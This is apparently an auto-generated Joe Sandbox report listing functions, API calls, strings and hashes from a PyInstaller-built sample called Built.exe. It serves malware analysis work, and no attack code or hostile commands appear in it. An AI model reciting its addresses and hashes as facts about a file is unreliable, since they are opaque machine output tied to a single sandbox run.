Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 26F0AF21B0860782FE108B20EC8533A6320FF84761F440235CA6E861E4DF2ED048EB03

Function 00007FF6266693D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF626669400
_set_statfp.LIBCMT ref: 00007FF62666941B
_set_statfp.LIBCMT ref: 00007FF626669437
_set_statfp.LIBCMT ref: 00007FF626669473

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 839da728aebb9bb77556e17cd32a6103cff6846385891e8410bf06912e5219f9
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 88118F72E5CA1301FF5C1525FC5637620447F59374E040734EE7EC62DA8EAEA941AB07

Function 00007FF62665B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B41F
FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B43E
FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B466
FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B477
FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B488

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction ID: 4f693b279e088b5053dbb626147a3c339ff2ec3b725095acc2c66729fd840cac
Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction Fuzzy Hash: 50117F60A0C60345FE68A7219E631796142BF847B0F588335E93DCA6DBDE2EE441AF03

Function 00007FF62665B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF62665B2A5
FlsSetValue.KERNEL32 ref: 00007FF62665B2C4
FlsSetValue.KERNEL32 ref: 00007FF62665B2EC
FlsSetValue.KERNEL32 ref: 00007FF62665B2FD
FlsSetValue.KERNEL32 ref: 00007FF62665B30E

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction ID: c9919ac2db97eb4bc1be2fd7a4628661d93e76f95d8e961aa834a1a8815db9f3
Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction Fuzzy Hash: 4B110360A0820786FE69A3614C6327A1142BF45370F584734D93EDA2C3DE2FB805AF93

Function 00007FF626656010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF626656176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665622C

Strings

verbose, xrefs: 00007FF626656020

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: dcc7626ceb969f4791abe236f85fde07e64d22b0293a6971aba1858fd95382af
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 9891AF32A08A4641FF618E29DC5237D3291BB44B94F644136DA4AC33E7DE3EE445EB43

Function 00007FF62665FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665FF17

Part of subcall function 00007FF626657AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF626657AC9

Strings

UTF-16LEUNICODE, xrefs: 00007FF62665FEB5
UTF-8, xrefs: 00007FF62665FE96
ccs, xrefs: 00007FF62665FE52

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 18a349483acf42ec169e6105a05702d57b502b0b67f55302b880493ff16e8da4
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 6C81AF32E082829DFFA45E25891227936A0FB11B48F558135DA09D769BDF3FE901BF03

Function 00007FF62664D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF62664D6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF62664D77A
RtlUnwindEx.KERNEL32 ref: 00007FF62664D7D4

Strings

csm, xrefs: 00007FF62664D761

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: 0f901787a06be744a7c178693a72e106887a6fa72cc5c19755e2968ed663cd31
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 8F51AF32F196029AEF24CB15E864A796791FB44B98F104131DA4E877C8DFBEE841DB02

Function 00007FF62664EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF62664EFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF62664EFF3

Strings

MOC, xrefs: 00007FF62664EFBB
RCC, xrefs: 00007FF62664EFC3

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 3ea4b310dadff013d513bc01293433b36559e9295327901e133b30c67d27607d
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 6661BE72908BC585EB309B15E8503AAB7A0FBC5B88F044235EB9C43B95CFBDD190CB42

Function 00007FF62664F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF62664F320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF62664F408

Strings

csm, xrefs: 00007FF62664F45A
csm, xrefs: 00007FF62664F342

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: 48e96f77dab55167929b669b7d6553ea229c55d619ebfb299d2cc947fa23bb9d
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: 865181329082828EEF748E21996436836A0FB95B94F149135DA5C87795CFBEE850DF43

Function 00007FF626647E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF62664352C,?,00000000,00007FF626643F23), ref: 00007FF626647F22

Strings

%s%c, xrefs: 00007FF626647E94
\, xrefs: 00007FF626647E87
%.*s, xrefs: 00007FF626647EDB

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction ID: 540cced50a328dd1f20bb940f2d3fe54eabee7226bfb0d1752e4e80dd14acea4
Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction Fuzzy Hash: 0E31D421719AC245EE718B21EC603EA6364FF94BE4F040231EA6D87BC9DF6DD6059F02

Function 00007FF626642810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6266428EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF626642868
Error, xrefs: 00007FF6266428DD
ERROR, xrefs: 00007FF62664286F

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: bdd7f91bfeed5a8977b4cfee13161e5ebdae5eaf08ae7c9fc98273865e83f8d3
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 1A21D372708B4292EB20DB14F8447EA7364FB88780F400132EA8D97756DF3DD259DB42

Function 00007FF62665C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF62665C68F
WriteFile.KERNEL32 ref: 00007FF62665C957
WriteFile.KERNEL32 ref: 00007FF62665C99D
GetLastError.KERNEL32 ref: 00007FF62665CA53

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: 77261c2cbaf06afefafb77863e4951acd1de37324186b6549721a396861f4a6c
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: ECD12772B18A81CAEF10CF65D8401AC3B72FB45798F048239DE5D97B8ADE39D016DB42

Function 00007FF62665F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF62665FAEC
_get_daylight.LIBCMT ref: 00007FF62665FAFD
_get_daylight.LIBCMT ref: 00007FF62665FB0E
_isindst.LIBCMT ref: 00007FF62665FBD9

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 614e647a57ed7aa687d5cf7d64855e2decccac492ccd7bb54dd9c1051a4f11c6
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 8A51E472F082128AEF24DF249D566BC27A5FB50358F500135DE1ED2AE6DF3AA4019F03

Function 00007FF6266557EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF62665581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF626655881
GetLastError.KERNEL32 ref: 00007FF626655912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF626655724), ref: 00007FF62665595E

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: ac2fc6da97adcbe52dcd2b1ec6b1ed622f2d1fdc720641d3268b5036b9825285
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: 6451BC62E186828AFF10DFB1D8553BD23A1BB48B58F144435DE0D9B68ADF3DD450AB43

Function 00007FF6266420C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6266420F4
SetWindowLongPtrW.USER32 ref: 00007FF626642116
GetWindowLongPtrW.USER32 ref: 00007FF626642140
InvalidateRect.USER32 ref: 00007FF626642160

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: d86fb4ccf68ccb054c457f0c74111a0236675593fdd9ef4bc345d6e5123cef19
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 8911E921A0C14382FE64876AFD9427A5296FB84780F544030DB4987B8DCDAFD491AB03

Function 00007FF626665B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6266617D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF626661803

_get_daylight.LIBCMT ref: 00007FF626665CA4
_get_daylight.LIBCMT ref: 00007FF626665CB5

Strings

?, xrefs: 00007FF626665C35

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction ID: 37800e8361a3dfe703810459f1b1267ab54125d95f0b7731b7bdae98e5dc0b6c
Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction Fuzzy Hash: 55411922A1868345FF249B25F8423796660FB80BA4F144239EF5D86AD5DE3ED441DF03

Function 00007FF626659084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266590B6

Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62664CC15), ref: 00007FF6266590D4

Strings

C:\Users\user\AppData\Local\Temp\Built.exe, xrefs: 00007FF6266590C2

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\Built.exe
API String ID: 3580290477-3074098987
Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction ID: c4784340ecc49216068ea27e7b8f106d7242c23d749b736892174fab2a9ed293
Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction Fuzzy Hash: 5E41BF32A08B6285EF149F25EC821BC27A8FB457C4F454135E94D83B96DE3FE4859B43

Function 00007FF62665CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF62665CDBF
GetLastError.KERNEL32 ref: 00007FF62665CDE1

Strings

U, xrefs: 00007FF62665CD6B

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 9dd750388ea1ae7e9e0c287f08b9ac49db762c15d189c90301a240ffe146a3b8
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 3941A032B18A82C2DB208F25E8453A9A7A1FB88794F404135EA4DC7B99EF3DD401DB42

Function 00007FF62665F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF62665F668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF62665F6BA

Strings

:, xrefs: 00007FF62665F67E

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

